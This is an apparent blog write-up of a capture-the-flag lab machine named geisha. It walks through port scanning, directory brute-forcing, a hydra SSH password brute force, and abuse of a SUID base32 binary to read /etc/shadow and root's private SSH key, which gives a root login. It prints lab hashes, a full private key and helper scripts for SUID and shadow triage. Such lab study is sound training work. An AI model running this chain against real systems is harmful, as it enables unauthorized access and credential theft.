
1. geisha target machine

Author: 循环不计次 | Published 2022-10-24 17:46

    [offensive-security] 1. geisha target machine


    1. Gathering target information

    1. Known information:

    • IP: 192.168.214.82

    2. Enumeration:

    • nmap scan of the open services

      ┌──(lo0p㉿0xlo0p)-[~]
      └─$ sudo nmap 192.168.214.82 -p 1-9999
      Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 17:02 CST
      Nmap scan report for 192.168.214.82
      Host is up (0.20s latency).
      Not shown: 9992 closed tcp ports (reset)
      PORT     STATE SERVICE
      21/tcp   open  ftp
      22/tcp   open  ssh
      80/tcp   open  http
      7080/tcp open  empowerid
      7125/tcp open  unknown
      8088/tcp open  radan-http
      9198/tcp open  unknown
      
      Nmap done: 1 IP address (1 host up) scanned in 22.23 seconds
      

    First browse ports 80, 7080, 7125, 8088 and 9198: they all serve the same web page. Next, brute-force the web directories. (Note that the scan above only covered ports 1-9999; a full sweep with -p- would also catch anything listening higher up.)

    • Brute-force web directories with dirsearch
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ dirsearch -u 192.168.214.82:7125
      _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                            
     (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                            
    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
    Output File: /home/lo0p/.dirsearch/reports/7125_22-10-24_17-00-31.txt
    Error Log: /home/lo0p/.dirsearch/logs/errors-22-10-24_17-00-31.log
    Target: http://192.168.214.82:7125/
    
    [17:00:31] Starting: 
    [17:01:22] 200 -  175B  - /index.php                                        
    [17:01:22] 200 -  175B  - /index.php/login/                                 
    [17:01:32] 200 -    1KB - /passwd                                           
                                                                                 
    Task Completed
    

    The service on port 7125 exposes a file called /passwd at the web root. Fetching it shows that it is a copy of the system's /etc/passwd.

    • Fetch and inspect the passwd file
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
    sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
    geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    lsadm:x:998:1001::/:/sbin/nologin
    

    Only two accounts have a real login shell (/bin/bash): root and geisha. Every other entry ends in nologin or sync, so those two are the only candidates for an SSH login.

    • Brute-force SSH for the root and geisha users with hydra (only the geisha run is shown)
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.214.82
    Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-24 17:12:00
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
    [DATA] attacking ssh://192.168.214.82:22/
    [STATUS] 130.00 tries/min, 130 tries in 00:01h, 14344271 to do in 1839:01h, 16 active
    [STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344063 to do in 2121:55h, 16 active
    [22][ssh] host: 192.168.214.82   login: geisha   password: letmein
    1 of 1 target successfully completed, 1 valid password found
    [WARNING] Writing restore file because 3 final worker threads did not complete until end.
    [ERROR] 3 targets did not resolve or could not be connected
    [ERROR] 0 target did not complete
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-24 17:17:13
    

    Brute-forcing root failed, but geisha succeeded with the password letmein. Note the rate in the status lines: about 130 tries per minute with 16 parallel tasks, which would take roughly 1800 hours for all of rockyou. This run finished in five minutes only because letmein sits near the top of the list. The hydra warning about parallel tasks refers to sshd's limit on concurrent unauthenticated connections, so -t 4 is the safer setting.

    • Log in as geisha over SSH

    After logging in, the first flag (local.txt) is in the home directory:

    geisha@geisha:~$ ls
    local.txt
    geisha@geisha:~$ cat local.txt 
    4fe47dd40410c975175f78ad08b0060e
    

    The second flag is presumably in root's home directory. Start by listing the files that have the SUID bit set:

    • Enumerate SUID files
    geisha@geisha:~$ find / -perm -4000 2>/dev/null # list files with the SUID bit set
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/bin/newgrp
    /usr/bin/passwd
    /usr/bin/umount
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/base32
    /usr/bin/sudo
    /usr/bin/fusermount
    /usr/bin/gpasswd
    /usr/bin/chfn
    /usr/bin/mount
    

    base32 stands out here. The rest of the list (passwd, su, sudo, mount, chsh, ...) is the normal set of SUID binaries on a Debian system, but base32 is a plain coreutils encoder and has no reason to be SUID. Because it is owned by root and SUID it runs with an effective UID of 0 and can open any file on the system; we encode the target file with it and decode the output ourselves to get the plaintext back. Confirm the bit with ls -l /usr/bin/base32 (the mode shows as -rwsr-xr-x).
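    The check a practitioner would want at this step is not to eyeball the find output but to diff it against a known-good SUID set and flag anything that is a known arbitrary-file-read primitive. The script below is an added example, not part of the original write-up: the current list is copied from the find output above, the baseline is a constructed approximation of a stock Debian 10 install (verify it against your own reference image), and the file-read table is a small constructed subset of what GTFOBins documents.

```shell
#!/bin/sh
# Added example: triage a SUID list against a baseline and flag file-read primitives.

# Copied from the walkthrough's find output.
CURRENT_SUID='/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/base32
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount'

# Constructed baseline (assumption: stock Debian 10 minus nothing else); replace with a
# list captured from a clean image of the same release.
BASELINE_SUID='/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/mount'

# Prints SUID paths present in the current list but absent from the baseline.
# Usage: unexpected_suid BASELINE_FILE CURRENT_FILE
unexpected_suid() {
    base=$(mktemp)
    sort "$1" > "$base"
    sort "$2" | comm -13 "$base" -
    rm -f "$base"
}

# For an unexpected SUID binary, print the command that reads an arbitrary file with it
# (same class of primitive as the base32 trick above). Returns 1 if it is not a known
# file-read primitive. Constructed subset of GTFOBins.
file_read_command() {
    case "$(basename "$1")" in
        base32) echo "$1 TARGET | base32 -d" ;;
        base64) echo "$1 TARGET | base64 -d" ;;
        xxd)    echo "$1 TARGET | xxd -r" ;;
        od)     echo "$1 -An -c TARGET" ;;
        cat|head|tail|more|less) echo "$1 TARGET" ;;
        *) return 1 ;;
    esac
}

# Live use: capture the real list instead of the constructed one:
#   find / -perm -4000 -type f 2>/dev/null > current.txt
demo() {
    t=$(mktemp -d)
    printf '%s\n' "$BASELINE_SUID" > "$t/baseline"
    printf '%s\n' "$CURRENT_SUID"  > "$t/current"
    unexpected_suid "$t/baseline" "$t/current" | while read -r bin; do
        if cmd=$(file_read_command "$bin"); then
            echo "$bin: unexpected SUID, reads arbitrary files: $cmd"
        else
            echo "$bin: unexpected SUID, check GTFOBins manually"
        fi
    done
    rm -r "$t"
}
demo
```

    On the walkthrough's list this reports a single entry, /usr/bin/base32, together with the read command the next step uses. The fix on the defending side is simply chmod u-s /usr/bin/base32.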

    • Read the shadow file (the first base32 runs as root and opens the file; the second, decoding, runs as the normal user)
    geisha@geisha:~/.ssh$ base32 "/etc/shadow" | base32 -d
    root:$6$3haFwrdHJRZKWD./$LYiTApGClgwmFE3TXMRtekWpGOY6fSpnTorsQL/FBr9YdOW4NHMzYFkOLu8qJQVa1wqfEC3a.SZeTHIyEhlPF0:18446:0:99999:7:::
    daemon:*:18385:0:99999:7:::
    bin:*:18385:0:99999:7:::
    sys:*:18385:0:99999:7:::
    sync:*:18385:0:99999:7:::
    games:*:18385:0:99999:7:::
    man:*:18385:0:99999:7:::
    lp:*:18385:0:99999:7:::
    mail:*:18385:0:99999:7:::
    news:*:18385:0:99999:7:::
    uucp:*:18385:0:99999:7:::
    proxy:*:18385:0:99999:7:::
    www-data:*:18385:0:99999:7:::
    backup:*:18385:0:99999:7:::
    list:*:18385:0:99999:7:::
    irc:*:18385:0:99999:7:::
    gnats:*:18385:0:99999:7:::
    nobody:*:18385:0:99999:7:::
    _apt:*:18385:0:99999:7:::
    systemd-timesync:*:18385:0:99999:7:::
    systemd-network:*:18385:0:99999:7:::
    systemd-resolve:*:18385:0:99999:7:::
    messagebus:*:18385:0:99999:7:::
    sshd:*:18385:0:99999:7:::
    geisha:$6$YtDFbbhHHf5Ag5ej$3EjLFKW1aSNBlfAhcyjmY97eLrNtbzDWQ9z5YvSvuA65kH7ZgHR1f9VGFhAEGGqiKAtF8//U45M8QOHouQrWb.:18494:0:99999:7:::
    systemd-coredump:!!:18385::::::
    ftp:*:18391:0:99999:7:::
    

    Feed root's hash to john.

    No result: it did not crack with the wordlist. Both hashes are sha512crypt ($6$), which is slow to attack, so unless the password is in the list this is a dead end.
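    Two of the manual steps above (picking the login-capable accounts out of passwd, and deciding which shadow entries are worth cracking) are the same parsing job, so here is one added example covering both. It is not code from the original post. The passwd and shadow samples are constructed to mirror the dumps above, with the hashes shortened and made up; john itself is not run, only its input file is produced.

```shell
#!/bin/sh
# Added example: triage /etc/passwd and /etc/shadow and build john's input.

# Constructed sample data modelled on the dumps above (hashes are fake/shortened).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
lsadm:x:998:1001::/:/sbin/nologin'

SAMPLE_SHADOW='root:$6$3haFwrdH$LYiTApGClgwmFE3TXMRtek:18446:0:99999:7:::
daemon:*:18385:0:99999:7:::
sync:*:18385:0:99999:7:::
www-data:*:18385:0:99999:7:::
geisha:$6$YtDFbbhH$3EjLFKW1aSNBlfAhcyjmY97e:18494:0:99999:7:::
systemd-coredump:!!:18385::::::'

# Accounts that can actually log in: field 7 is a real shell, not nologin/false/sync.
# Reads passwd on stdin, prints one username per line.
login_users() {
    awk -F: '$7 !~ /(nologin|false|sync)$/ { print $1 }'
}

# Shadow entries carrying a real hash (field 2 starts with "$"); locked entries
# ("*", "!", "!!") are skipped. Reads shadow on stdin, prints "user algorithm".
crackable_hashes() {
    awk -F: '
        $2 ~ /^\$/ {
            split($2, p, "[$]")
            alg = "unknown"
            if (p[2] == "1") alg = "md5crypt"
            if (p[2] == "5") alg = "sha256crypt"
            if (p[2] == "6") alg = "sha512crypt"
            if (p[2] == "y") alg = "yescrypt"
            if (p[2] == "2a" || p[2] == "2b" || p[2] == "2y") alg = "bcrypt"
            print $1, alg
        }'
}

# Merge passwd and shadow the way john's unshadow does: the "x" in passwd field 2 is
# replaced by the shadow hash. Keeps only login-capable users with real hashes, which
# is the list worth cracking. Usage: join_for_john PASSWD_FILE SHADOW_FILE
join_for_john() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }
        ($1 in hash) && hash[$1] ~ /^\$/ && $7 !~ /(nologin|false|sync)$/ {
            $2 = hash[$1]; print
        }' "$2" "$1"
}

tmp=$(mktemp -d)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp/passwd"
printf '%s\n' "$SAMPLE_SHADOW" > "$tmp/shadow"
echo "login-capable accounts:"; login_users < "$tmp/passwd"
echo "crackable hashes:";       crackable_hashes < "$tmp/shadow"
join_for_john "$tmp/passwd" "$tmp/shadow" > "$tmp/john.in"
echo "john input:"; cat "$tmp/john.in"
# On the attacking box (not run here):
#   john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt "$tmp/john.in"
rm -r "$tmp"
```

    On the sample data this yields root and geisha as the only accounts worth attention, both with sha512crypt hashes, and a two-line john input. Against the real files the same functions take /etc/passwd (or the leaked /passwd) and the shadow dump obtained through base32.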

    • Try to read root's SSH private key. root has a login shell and sshd is listening, so /root/.ssh/id_rsa is the next target for the same SUID read:
    geisha@geisha:~/.ssh$ base32 "/root/.ssh/id_rsa" | base32 -d
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4
    OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5
    89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd
    5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6
    fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26
    TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww
    WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U
    1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR
    Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb
    8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+
    10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO
    jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o
    2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/
    cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl
    THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub
    RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH
    xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE
    1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr
    edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ
    65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/
    XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh
    zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf
    v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M
    OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv
    bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s=
    -----END RSA PRIVATE KEY-----
    

    That works. Save the key locally as root_key.

    • Log in as root over SSH with the private key and read the second flag
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ vim root_key    
                                                                                                                                                                                                                                                
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ chmod 600 root_key                       
                                                                                                                                                                                                                                                
    ┌──(lo0p㉿0xlo0p)-[~]
    └─$ ssh -i root_key root@192.168.214.82      
    Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Mon Oct 24 04:31:45 2022 from 192.168.49.214
    root@geisha:~# ls
    flag.txt  proof.txt
    root@geisha:~# cat proof.txt 
    524a212f49a1a7f7f777b6d0b9f44fba
    root@geisha:~#
    

    The chmod 600 on root_key is mandatory: ssh checks the mode of the identity file and ignores one that is readable by group or others, printing "Permissions 0644 for 'root_key' are too open" followed by "This private key will be ignored". The pasted key must also be complete, including the newline after the END line, or ssh will fail to parse it.
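    A small pre-flight check for a key recovered this way, added here as an example rather than taken from the original post: it verifies the pasted PEM is complete, fixes the mode, and, when ssh-keygen is available, derives the public key so the fingerprint can be compared with /root/.ssh/authorized_keys on the target. The function names and the mode check via ls -l are this example's own choices.

```shell
#!/bin/sh
# Added example: sanity-check a saved private key before handing it to ssh -i.

# ssh refuses an identity file readable by group or others. Returns 0 when the mode is
# owner-only (600/400), 1 otherwise. Parses ls -l so it works on GNU and BSD userland.
key_perms_ok() {
    mode=$(ls -l "$1" | cut -c5-10)   # group and other permission characters
    [ "$mode" = "------" ]
}

# A pasted PEM must carry its BEGIN line, its END line, and a trailing newline;
# a key copied from a terminal often loses the last one.
key_looks_complete() {
    head -n1 "$1" | grep -q '^-----BEGIN .*PRIVATE KEY-----$' || return 1
    tail -n1 "$1" | grep -q '^-----END .*PRIVATE KEY-----$' || return 1
    [ "$(tail -c1 "$1" | od -An -c | tr -d ' ')" = '\n' ]
}

# Derives the public key from the private key (this also validates the key material)
# and prints its fingerprint for comparison with the target's authorized_keys.
key_fingerprint() {
    ssh-keygen -y -f "$1" > "$1.pub" && ssh-keygen -lf "$1.pub"
}

# Full pre-flight: structure, mode, fingerprint. Usage:
#   prepare_key root_key && ssh -i root_key root@192.168.214.82
prepare_key() {
    key_looks_complete "$1" || { echo "$1: truncated or not a PEM private key" >&2; return 1; }
    chmod 600 "$1"
    key_perms_ok "$1" || { echo "$1: could not restrict permissions" >&2; return 1; }
    if command -v ssh-keygen >/dev/null 2>&1; then
        key_fingerprint "$1"
    fi
}
```

    If key_fingerprint reports an error, the pasted key is damaged (a dropped line or stray whitespace from the terminal copy) and no permission fix will make ssh accept it.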


    Original article: https://www.haomeiwen.com/subject/iepgzrtx.html